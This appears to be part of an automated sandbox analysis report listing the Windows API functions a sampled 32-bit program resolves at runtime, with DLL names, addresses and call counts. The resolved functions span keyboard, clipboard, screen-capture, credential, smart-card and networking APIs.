| Get Address | c:\windows\syswow64\secur32.dll | function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = 680, address_out = 0x753cdb90 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlDecompressBuffer, address_out = 0x779d6b80 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExA, address_out = 0x74abfa60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptExportKey, address_out = 0x74abfb30 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptAcquireContextW, address_out = 0x74ac0590 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptSetProvParam, address_out = 0x74ad6c90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptReleaseContext, address_out = 0x74ac0650 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGenRandom, address_out = 0x74ac10a0 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x74abcbe0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGenKey, address_out = 0x74ac3910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptDestroyKey, address_out = 0x74ac0400 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGetUserKey, address_out = 0x74ad6c30 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = IsValidSecurityDescriptor, address_out = 0x74ad7070 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74abe430 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityDescriptorSacl, address_out = 0x74ac2a20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryInfoKeyW, address_out = 0x74abf640 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74ac04f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenCurrentUser, address_out = 0x74ac1080 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumValueW, address_out = 0x74abf680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumKeyExW, address_out = 0x74abf470 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGetHashParam, address_out = 0x74abf7d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredFree, address_out = 0x74ac3930 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumKeyExA, address_out = 0x74ac1810 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptAcquireContextA, address_out = 0x74ac0630 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptCreateHash, address_out = 0x74abfa00 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumValueA, address_out = 0x74ac1e70 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateA, address_out = 0x74ad6670 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptDestroyHash, address_out = 0x74ac02a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptHashData, address_out = 0x74abfb10 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DeregisterEventSource, address_out = 0x74ab8570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterEventSourceA, address_out = 0x74ac1570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityInfo, address_out = 0x74ac05f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSecurityInfo, address_out = 0x74abfbe0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetEntriesInAclA, address_out = 0x74ac3cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ReportEventA, address_out = 0x74ad37a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageW, address_out = 0x778262e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x7782abd0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ToUnicodeEx, address_out = 0x77892420 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CallNextHookEx, address_out = 0x77823550 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyState, address_out = 0x7782ddd0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageW, address_out = 0x77844f60 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CloseClipboard, address_out = 0x778495c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MapVirtualKeyA, address_out = 0x77843e20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DrawIcon, address_out = 0x7783f6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetIconInfo, address_out = 0x77840160 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcW, address_out = 0x779eaee0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetClipboardViewer, address_out = 0x77849a80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x77825d90 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UnhookWindowsHookEx, address_out = 0x77848fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = OpenClipboard, address_out = 0x77843920 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowsHookExW, address_out = 0x7782fb10 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExW, address_out = 0x77829860 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowTextW, address_out = 0x7783cb20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetClipboardData, address_out = 0x77842bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetProcessWindowStation, address_out = 0x77848b10 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxA, address_out = 0x7788fec0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetUserObjectInformationW, address_out = 0x77848fa0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x7783e130 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MapVirtualKeyW, address_out = 0x77843c80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x77846f10 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = IsCharAlphaNumericW, address_out = 0x7789ac00 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorPos, address_out = 0x7783f6c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLowerW, address_out = 0x7789ab20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyboardState, address_out = 0x77849060 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExW, address_out = 0x77829580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyboardLayout, address_out = 0x7782ef20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetAsyncKeyState, address_out = 0x7782e820 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleFileNameExW, address_out = 0x772c13e0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetProcessMemoryInfo, address_out = 0x772c16c0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleFileNameExA, address_out = 0x772c1660 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = EnumProcessModules, address_out = 0x772c1360 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAEnumProtocolsW, address_out = 0x746d7ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 22, address_out = 0x746d4970 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x746d2f70 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 5, address_out = 0x746d48b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 4, address_out = 0x746d6090 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 8, address_out = 0x746c4ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 9, address_out = 0x746c4a90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 13, address_out = 0x746d5f50 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 16, address_out = 0x746d1d20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 21, address_out = 0x746cecc0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 112, address_out = 0x746c5a10 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 7, address_out = 0x746d3e40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSASocketW, address_out = 0x746ce7d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSASendTo, address_out = 0x746d7f90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 6, address_out = 0x746d3830 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSARecvFrom, address_out = 0x746d8090 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSARecv, address_out = 0x746d2c50 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 10, address_out = 0x746ce180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 18, address_out = 0x746d1f00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = GetNameInfoW, address_out = 0x746d4050 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = GetAddrInfoW, address_out = 0x746d2180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = FreeAddrInfoW, address_out = 0x746d5ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSADuplicateSocketW, address_out = 0x746efca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSASend, address_out = 0x746d2de0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 14, address_out = 0x746c4ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 151, address_out = 0x746c47e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 17, address_out = 0x746d7370 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSCGetProviderPath, address_out = 0x746fde80 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 57, address_out = 0x746f12a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 111, address_out = 0x746c4f60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 12, address_out = 0x746d59f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 19, address_out = 0x746d1b90 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = BitBlt, address_out = 0x76f82230 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x76f80fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = CreateDCW, address_out = 0x76fb2ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = DeleteObject, address_out = 0x76f80810 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SelectObject, address_out = 0x76f80440 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = CreateCompatibleBitmap, address_out = 0x76f82390 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = DeleteDC, address_out = 0x76f80d00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDIBits, address_out = 0x76f81580 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = CreateCompatibleDC, address_out = 0x76f82050 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlUnwind, address_out = 0x779c33a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memmove, address_out = 0x779dcc90 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = wcschr, address_out = 0x779de7a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _stricmp, address_out = 0x779db580 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strncmp, address_out = 0x779ddea0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memchr, address_out = 0x779dc820 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strncpy, address_out = 0x779ddf60 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strstr, address_out = 0x779de1a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _aullrem, address_out = 0x779da880 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strcspn, address_out = 0x779ddc80 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = wcsstr, address_out = 0x779deaa0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strchr, address_out = 0x779ddb20 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = wcsrchr, address_out = 0x779dea00 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = strrchr, address_out = 0x779de110 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = VerSetConditionMask, address_out = 0x779c1a40 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtUnmapViewOfSection, address_out = 0x779d6f40 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwClose, address_out = 0x779d6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtCreateSection, address_out = 0x779d7140 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryVirtualMemory, address_out = 0x779d6ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardEstablishContext, address_out = 0x6fffc590 |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardFreeMemory, address_out = 0x6fffc9c0 |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardDisconnect, address_out = 0x6fffc410 |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardListReadersA, address_out = 0x70001ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\winscard.dll | function = SCardConnectA, address_out = 0x70000e30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779bd830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x765ba2b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779bf730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x765ba290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x765b9bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x765e2430 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileAttributesW, address_out = 0x765c6c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x765c6f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SystemTimeToTzSpecificLocalTime, address_out = 0x765c5c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x765c6fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x765b8c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x765ba790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x765b8500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x765c5140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x765c6a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileExW, address_out = 0x765c6940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x765b7950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x765c6730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765bb0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x765e2670 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatW, address_out = 0x765bf7f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatW, address_out = 0x765bfd90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringW, address_out = 0x765c2630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoW, address_out = 0x765bcd70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocale, address_out = 0x765bab40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLCID, address_out = 0x765c2920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesW, address_out = 0x765bff10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushConsoleInputBuffer, address_out = 0x765c7080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalMemoryStatus, address_out = 0x765b8e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetWindowsDirectoryA, address_out = 0x765bb060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DebugBreak, address_out = 0x765e0920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputW, address_out = 0x765c6fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCursorInfo, address_out = 0x765c70b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FillConsoleOutputAttribute, address_out = 0x765c7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleCursorInfo, address_out = 0x765c71a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x765c70c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FillConsoleOutputCharacterW, address_out = 0x765c7070 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x765c7020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleCursorPosition, address_out = 0x765c71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x765c7000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x765c6fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleTextAttribute, address_out = 0x765c71f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNumberOfConsoleInputEvents, address_out = 0x765c6f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x765c6880 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x765baac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsA, address_out = 0x765c5dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x765c4f80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatA, address_out = 0x765bf640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765ba720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x765ba7e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVolumeInformationA, address_out = 0x765c6b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x765ba940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x765c67d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x765bab60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadCodePtr, address_out = 0x765bd0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x765b2af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisableThreadLibraryCalls, address_out = 0x765ba860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetProcessWorkingSetSize, address_out = 0x765c0120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x765b1b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapDestroy, address_out = 0x765c4c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapCreate, address_out = 0x765ba100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToDosDateTime, address_out = 0x765c2930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x765ba840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameA, address_out = 0x765c6b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToLocalFileTime, address_out = 0x765c68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandle, address_out = 0x765c6a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathA, address_out = 0x765c6b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileA, address_out = 0x765c68b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = 200, address_out = 0x76b99590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x765ba980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x765c4ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x765b7570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x765b9e30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x765c6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x765c66a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x765c6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x765bb040 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x765bace0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779a7dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779b4010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779b2a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x765ba7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779b2290 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779b2910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779d7a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779cac00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779ba890 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x765bac80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x765e0830 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x775f6270 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x765bfe80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x765bff80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x765e0e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x765ba750 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x765e1240 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x765bad60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x765e1460 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x765b9a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7757ded0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x765b3630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlPcToFileHeader, address_out = 0x779b5100 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtDeviceIoControlFile, address_out = 0x779d6cf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryInformationFile, address_out = 0x779d6d90 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtSetInformationFile, address_out = 0x779d6f10 |
|
1 | |
